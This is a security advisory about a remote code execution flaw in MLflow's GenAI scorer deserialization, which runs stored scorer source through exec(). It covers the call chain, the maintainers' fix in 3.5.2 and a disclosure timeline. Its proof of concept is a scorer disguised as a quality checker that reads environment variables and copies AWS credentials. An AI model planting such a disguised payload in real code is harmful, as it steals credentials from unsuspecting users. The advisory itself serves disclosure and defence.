Remote Code Execution via GenAI Scorer Deserialization in MLflow

Author: Evan Harris
Risk: High
Affected Component: MLflow GenAI scorers (mlflow/mlflow)

TL;DR

MLflow’s GenAI scorer deserialization mechanism contained a remote code execution vulnerability. The recreate_function() utility in scorer_utils.py passed attacker-controlled scorer data (stored in the MLflow tracking database) directly to Python’s exec(). A malicious scorer registered by one user executes arbitrary code on the machine of anyone who later retrieves and runs it, enabling a supply chain attack across an entire ML team. We reported the issue to the MLflow maintainers, who fixed it by restricting custom scorer registration and loading to Databricks-controlled environments. Users should upgrade to MLflow 3.5.2 or later.

Background

MLflow’s GenAI module lets teams define scorers, Python functions that evaluate the quality of LLM outputs (length checks, content safety, formatting, and so on). Scorers can be authored with the @scorer decorator, registered against an experiment, and later retrieved by name with get_scorer() so that colleagues can reuse a shared evaluation.

To make this work, MLflow serializes the scorer’s underlying function and stores it in the tracking database. When the scorer is retrieved, MLflow reconstructs the function from that stored data. The reconstruction step is where the vulnerability lived: the serialized source was reconstituted by calling Python’s exec(), which runs whatever code it is given. Because the stored data is fully attacker-controlled, anyone who could register a scorer could plant code that would execute inside another user’s process.

Overview

The vulnerability is triggered along a single deserialization call chain that ends in exec():

%%{init: {'themeVariables': {'fontSize': '18px'}}}%%
flowchart TD
    A[Attacker authors malicious @scorer
with payload hidden in the body] --> B[Distributed via PyPI, GitHub,
or shared Python module]
    B --> C[Victim imports and registers
the scorer with MLflow]
    C --> D[Serialized function stored in
tracking database]
    D --> E["get_scorer(name, experiment_id)
registry.py:571"]
    E --> F["Scorer.model_validate()
base.py:222"]
    F --> G["_reconstruct_decorator_scorer()
base.py:298"]
    G --> H["recreate_function()
scorer_utils.py:131"]
    H --> I["exec(attacker_source)"]
    I --> J[Remote Code Execution
in victim process]

    style A fill:#ffebee
    style B fill:#ffebee
    style C fill:#fff3e0
    style D fill:#fff9c4
    style E fill:#fff9c4
    style F fill:#fff9c4
    style G fill:#fff9c4
    style H fill:#ffcdd2
    style I fill:#ffcdd2
    style J fill:#ffcdd2

The call chain is:

mlflow.genai.scorers.get_scorer()
  → Scorer.model_validate()        # registry.py:571
  → _reconstruct_decorator_scorer() # base.py:222
  → recreate_function()             # base.py:298
  → exec()                          # scorer_utils.py:131  ← REMOTE CODE EXECUTION

Attack Scenario

An attacker authors a scorer that looks legitimate (a “quality checker” with a believable docstring) but hides a malicious payload in the function body.
The attacker distributes the scorer through a channel the victim trusts: a PyPI package, a team GitHub repository, or a shared Python module.
A victim imports the scorer and registers it with MLflow. The serialized function is written to the tracking database.
Later, possibly on a different machine, by a different team member, days or weeks afterward, someone retrieves the scorer with get_scorer() and uses it.
During deserialization, recreate_function() calls exec() on the stored source. The hidden payload runs with the full privileges of the victim’s process.

Because the trigger is decoupled in time and across users from the registration, the attack is silent: a single malicious scorer registered once can compromise everyone on the team who later pulls it.

Proof of Concept

The malicious scorer below presents itself as an output quality checker. The body contains a payload that drops a marker file, exfiltrates environment variables, and harvests AWS credentials before returning a plausible result to avoid suspicion:

from mlflow.genai.scorers import scorer

@scorer
def quality_checker(outputs):
    """
    Quality checker for LLM outputs.

    Validates that outputs meet quality standards:
    - Minimum length requirements
    - No offensive content
    - Proper formatting

    Returns:
        bool: True if output passes quality checks
    """
    # MALICIOUS PAYLOAD HIDDEN BELOW
    import os

    # Create proof file
    os.system('touch /tmp/rce_supply_chain.txt')
    os.system('echo "COMPROMISED VIA SUPPLY CHAIN" > /tmp/rce_supply_chain.txt')

    # Exfiltrate environment variables
    env_data = dict(os.environ)
    with open('/tmp/exfiltrated_env.txt', 'w') as f:
        f.write("EXFILTRATED ENVIRONMENT:\n")
        for key, value in list(env_data.items())[:10]:
            f.write(f'{key}={value}\n')

    # Harvest AWS credentials
    aws_creds_path = os.path.expanduser('~/.aws/credentials')
    if os.path.exists(aws_creds_path):
        with open(aws_creds_path, 'r') as f_in:
            with open('/tmp/aws_credentials_stolen.txt', 'w') as f_out:
                f_out.write(f_in.read())

    # Return a valid result to avoid suspicion
    return len(outputs) > 10

The victim retrieves the shared scorer as they normally would:

import mlflow
from mlflow.genai.scorers import get_scorer

# Different machine, different user, or days later
mlflow.set_tracking_uri("sqlite:///mlflow_tracking/mlflow.db")

scorer = get_scorer(name="quality_checker_v1", experiment_id="1")

And then uses it:

result = scorer(outputs="This is test output to evaluate")

At this point the RCE fires and the payload runs in the victim’s process.

Impact

Depending on the payload carried in the untrusted scorer data, an attacker can:

Execute arbitrary Python code with the full privileges of the victim’s process
Exfiltrate sensitive data such as credentials, environment variables, and source code
Harvest credentials from common locations (AWS, Docker, SSH)
Establish persistence on the victim’s machine
Perform lateral movement and network reconnaissance

The impact is amplified by the supply chain nature of the flaw: one malicious scorer registered by a single team member can compromise every user who later retrieves it, with the trigger occurring silently long after registration.

MLflow Response

After we disclosed the issue through MLflow’s coordinated disclosure process, the maintainers addressed it in pull request #18493.

Rather than attempting to sandbox or validate the deserialized source, the maintainers removed the dangerous capability outside of controlled environments: registering and loading custom code-based scorers is now restricted to Databricks tracking environments, where the set of users who can upload scorers is controlled. Users on other tracking backends are directed toward safer alternatives such as built-in scorers and make_judge()-based scorers, which do not require arbitrary code execution during deserialization.

The fix shipped in MLflow 3.5.2.

Recommendations

For End Users

Upgrade to MLflow 3.5.2 or later.
Only register and retrieve custom scorers from sources you fully trust.
Treat scorer data in a tracking database as untrusted code, not inert data. Anyone who can write to the tracking store can run code on every consumer.
Prefer built-in scorers or make_judge() scorers, which do not execute arbitrary code during deserialization.
Restrict write access to shared tracking databases and review scorers before reuse across a team.

Timeline

Date	Event
October 20, 2025	Vulnerability reported to MLflow maintainers via coordinated disclosure (issue #18404)
October 24, 2025	MLflow merges fix (PR #18493), released in v3.5.2
January 8, 2026	huntr marked the issue as a duplicate
June 8, 2026	Public disclosure